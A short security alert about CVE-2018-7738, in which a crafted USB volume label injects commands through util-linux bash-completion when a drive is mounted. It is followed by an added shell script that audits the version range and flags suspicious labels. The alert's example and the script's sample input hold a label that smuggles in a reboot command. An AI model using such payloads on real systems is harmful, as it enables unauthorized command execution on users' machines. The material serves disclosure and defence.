⚠ Malicious Command Execution via bash-completion (CVE-2018-7738)
At minimum, affected versions: Ubuntu 18.04
This issue affects any system using the util-linux mount/umount bash-completion scripts between versions 2.24 and 2.31.
A series of bugs allows a specially formatted USB drive name to run code on mount.
Example:
sudo mkfs.ntfs -f -L 'IFS=,;a=sudo,reboot;\$a' /dev/sdb1
umount
(severity: 🔷 low) - requires physical access
More info: https://yt.gl/say6z
#alert #severityLow #local #bash
Discuss this at @itsectalk and let your Linux sysadmins know.
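An added example, not part of the original alert: a POSIX shell audit that tests whether a util-linux version falls in the 2.24 to 2.31 range quoted above and flags volume labels containing shell metacharacters. The function names, the metacharacter set, the sample device names, and the treatment of 2.31.x point releases as in range are assumptions.

```bash
#!/bin/sh
# Added example (not from the alert): audit helpers for CVE-2018-7738.

# Return 0 if version $1 (e.g. "2.31.1", as reported by `mount --version`)
# has a major.minor between 2.24 and 2.31, the range given in the alert.
# Return 1 if outside the range, 2 if the string cannot be parsed.
version_in_affected_range() {
    ver=${1%%[!0-9.]*}          # drop suffixes such as "-rc1"
    major=${ver%%.*}
    rest=${ver#*.}
    minor=${rest%%.*}
    case "$major" in ''|*[!0-9]*) return 2 ;; esac
    case "$minor" in ''|*[!0-9]*) return 2 ;; esac
    [ "$major" -eq 2 ] && [ "$minor" -ge 24 ] && [ "$minor" -le 31 ]
}

# Return 0 if a volume label contains characters the shell treats specially.
# The character set is an assumption: a conservative list, not taken from the alert.
label_is_suspicious() {
    case "$1" in
        *'`'*|*'$'*|*';'*|*'|'*|*'&'*|*'<'*|*'>'*|*'('*|*')'*|*'\'*) return 0 ;;
    esac
    return 1
}

# Read "DEVICE LABEL" lines on stdin and print each device whose label is suspicious.
# Everything after the first field is treated as the label, so labels may contain spaces.
audit_labels() {
    while read -r dev label; do
        if label_is_suspicious "$label"; then
            printf '%s\n' "$dev"
        fi
    done
}

# Constructed sample input: device names are made up; the sdb1 label is the
# one shown in the alert's example.
sample='sda1 BACKUP_2024
sdb1 IFS=,;a=sudo,reboot;\$a
sdc1 My Photos'

printf '%s\n' "$sample" | audit_labels
```

On a live system the same functions can be fed the installed version string and a device/label listing in place of the constructed sample.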